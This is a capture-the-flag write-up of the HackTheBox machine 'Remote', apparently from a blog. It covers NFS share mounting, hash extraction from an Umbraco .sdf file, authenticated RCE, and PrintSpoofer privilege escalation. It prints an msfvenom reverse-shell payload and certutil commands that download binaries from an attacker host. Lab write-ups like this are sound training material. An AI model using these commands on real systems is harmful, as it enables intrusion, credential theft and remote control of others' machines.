Remote | NFS, .sdf file, impersonation

This challenge from HackTheBox is rated Easy and is also on the list from TJNull's prep for the OSCP exam. Remote is an interesting challenge that was quite difficult for me as I haven't experienced dealing with a .sdf file before.

by Johann Van Niekerk

Remote | NFS, .sdf file, impersonation

Share

Remote from HackTheBox

Introduction

This challenge from HackTheBox is rated Easy and is also on the list from TJNull's prep for the OSCP exam. Remote is an interesting challenge that was quite difficult for me as I haven't experienced dealing with a .sdf file before. The initial enumeration and getting to the attack vector is aligned with the challenge difficulty however when it came to mounting the share and navigating the significant amount of files available; it became apparent that after you check for some easy interesting files, then you need to rely on some automated searches such as grep and so forth.

The problem was that the .sdf file is a database file in the SQL Server Compact (SQL CE) format, which is developed by Microsoft and contains juicy information but unless you were familiar with the file it was very easy to pass over it.

Otherwise the challenge was fairly easy going from user access and moving towards privileged access and a great experience for keeping your eye open for file types.

Enumeration

sudo nmap -sV 10.10.10.180
21/tcp   open  ftp           Microsoft ftpd
80/tcp   open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
111/tcp  open  rpcbind       2-4 (RPC #100000)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds?
2049/tcp open  mountd        1-3 (RPC #100005)

Initially started with enumeration on a few of the simple ports as it is typically quicker to determine if there is valuable information. Starting with Port 21 it is quick to check if there is anything and we find that it is possible to login with anonymous credentials. This is common for FTP services to be tested for anonymous login.

username: anonymous
password: anonymous

While enumerating the service, nothing is uncovered and we will come back later if it is needed. Next checking the web application leads to finding out that the page being served is .asp and part of a content management system named umbraco. We use this information to see if there is any listed vulnerabilities known regarding this CMS and we find a few available however we don't know the version number.

Unfortunately it was not possible to find out any version numbers from the web app and while there was numerous exploits available; most required authentication so the name of the game is still trying to lead to credentials.

Eventually by navigating the webpage, uncover a login page when we click on the "Forms" button within the Contact page. Testing with common credentials does not lead anywhere either.

After looking through burp, testing SQLi and directory busting; I decided to move on and look at other open ports. What was interesting was port 111 - rpcbind was open. A quick command returned some information that was not expected, namely NFS. When looking at our NMAP scan, we also see that port 2049 - mountd that goes hand in hand with rpcbind. This likely meant that there are folders being shared.

Running some nmap scripts for NFS has uncovered that the directory /site_backups is being shared and available.

In order to take advantage of this opportunity we setup a folder that we want to 'host' the content on and then we mount the remote share folder that contains a rather large deposit of files, including config files and so forth.

It took a rather long time to search through the files and find anything interesting. It wasn't until I incidently stumbled onto a .sdf file and I was curious what google would tell me. This was a database file for SQL.

Exploitation

defaultapppool

The file itself shows up as a binary however using either cat or strings ended up dumping all the important information from this database file.

We ended up with 3 unique hashes that we could solve and as you may notice the admin hash was SHA1. Using something simple as crackstation.net ended up with the password hash being matched within seconds. This meant we have our first set of credentials and we need to test it somewhere.

I've tried several different methods of testing the credentials (as SMB was also an open port) and it all failed. While on the web application login I also attempted it with numerous methods and it always ended up failing. It wasn't until I cleared the input box and saw the following that I was reminded of what I was doing wrong:

It requires the full email address and I have just been using admin, adminadmin and administrator. This was a good lesson in paying attention.

With a successful login, it was directed to the admin portal and we were able to quickly uncover the CMS version.

If you recall our previous exploit checks; the version we found aligns perfectly with an authenticated remote code execution script and we just recently got our credentials!

The python script has simple syntax and allowed you to immediately be able to exploit the system with code execution.

This was also a tough lesson is looking at your errors and reading the exploit code! I was attempting numerous methods of being able to send a reverse shell through this script however I wasn't paying enough attention as the additional arguments needed to be signaled with -a

Finally with a simple powershell base64 payload, we have successfully gotten through to a user shell.

System

The first thing we check is our privileges and immediately and enabled privilege stands out:

It is possible to take advantage of this privilege in order to escalate to SYSTEM. My preference with impersonation attacks is to use PrintSpoofer and you can get a working binary from Github PrintSpoofer or by googling.

The attack requires two files to be located on the target machine; the binary and another payload for a separate reverse shell.

# Setup payload
msfvenom -p windows/shell_reverse_tcp lhost=10.10.10.6 lport=4445 -e x86/shikata_ga_nai -f exe -o shell.exe

# Transferred the necessary files over for impersonation attack
certutil -f -urlcache http://10.10.10.6/PrintSpoofer.exe print.exe
certutil -f -urlcache http://10.10.10.6/shell.exe shell.exe

After setting up an appropriate listener and running the PrintSpoofer exploit with the appropriate switches results in a system shell!

Final Word

The box is one a TJNulls list of OSCP-like boxes and the challenge was interesting and reinforces your methodology to look and use google to your advantage when you discover something that appears interesting. Overall I did find the challenge frustrating but that was due to my own experiences with file types being insufficient. Next time I'll definitely not be skipping over .sdf files again.